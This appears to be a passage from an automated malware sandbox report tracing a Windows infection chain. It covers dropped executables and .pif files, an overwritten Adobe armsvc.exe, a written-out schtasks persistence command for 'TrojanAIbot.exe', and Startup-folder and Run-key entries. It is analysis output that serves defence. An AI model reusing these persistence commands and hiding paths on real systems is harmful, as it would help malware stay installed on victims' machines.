Source: alpha.pif.7.dr	Static PE information: section name: .didat
Source: armsvc.exe.10.dr	Static PE information: section name: .didat

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B3D2FC push 02B3D367h; ret	4_2_02B3D35F
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B163B0 push 02B1640Bh; ret	4_2_02B16403
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B163AE push 02B1640Bh; ret	4_2_02B16403
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B1332C push eax; ret	4_2_02B13368
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B3C378 push 02B3C56Eh; ret	4_2_02B3C566
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B1C349 push 8B02B1C1h; ret	4_2_02B1C34E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B3D0AC push 02B3D125h; ret	4_2_02B3D11D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B2306B push 02B230B9h; ret	4_2_02B230B1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B2306C push 02B230B9h; ret	4_2_02B230B1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B3D1F8 push 02B3D288h; ret	4_2_02B3D280
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B2F108 push ecx; mov dword ptr [esp], edx	4_2_02B2F10D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B3D144 push 02B3D1ECh; ret	4_2_02B3D1E4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B16782 push 02B167C6h; ret	4_2_02B167BE
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B16784 push 02B167C6h; ret	4_2_02B167BE
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B1D5A0 push 02B1D5CCh; ret	4_2_02B1D5C4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B3C570 push 02B3C56Eh; ret	4_2_02B3C566
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B1C56C push ecx; mov dword ptr [esp], edx	4_2_02B1C571
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B2AAE0 push 02B2AB18h; ret	4_2_02B2AB10
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B28AD8 push 02B28B10h; ret	4_2_02B28B08
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B2AADF push 02B2AB18h; ret	4_2_02B2AB10
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B1CA4E push 02B1CD72h; ret	4_2_02B1CD6A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B1CBEC push 02B1CD72h; ret	4_2_02B1CD6A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B2886C push 02B288AEh; ret	4_2_02B288A6
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B84850 push eax; ret	4_2_02B84920
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B2790C push 02B27989h; ret	4_2_02B27981
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B26946 push 02B269F3h; ret	4_2_02B269EB
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B26948 push 02B269F3h; ret	4_2_02B269EB
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B25E7C push ecx; mov dword ptr [esp], edx	4_2_02B25E7E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B22F60 push 02B22FD6h; ret	4_2_02B22FCE
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 11_2_00EF0C55 push edi; retf	11_2_00EF0C7A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_04784277 push ebx; ret	13_2_047842DA

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Wisrysxl.PIF	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\Public\Libraries\lxsyrsiW.pif	Jump to dropped file

Drops executable to a common third party application directory

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\Public\Libraries\lxsyrsiW.pif

System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Jump to behavior

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File created: C:\Users\user\AppData\Local\Temp\neworigin.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Wisrysxl.PIF	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\user\AppData\Local\Temp\x.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	File created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\Public\Libraries\lxsyrsiW.pif	Jump to dropped file
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File created: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\esentutl.exe

File created: C:\Users\Public\alpha.pif

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\SysWOW64\esentutl.exe

File created: C:\Users\Public\alpha.pif

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:33 /du 23:59 /sc daily /ri 1 /f

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Source: C:\Users\user\AppData\Local\Temp\x.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wisrysxl			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wisrysxl			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B2AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_02B2AB1C

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
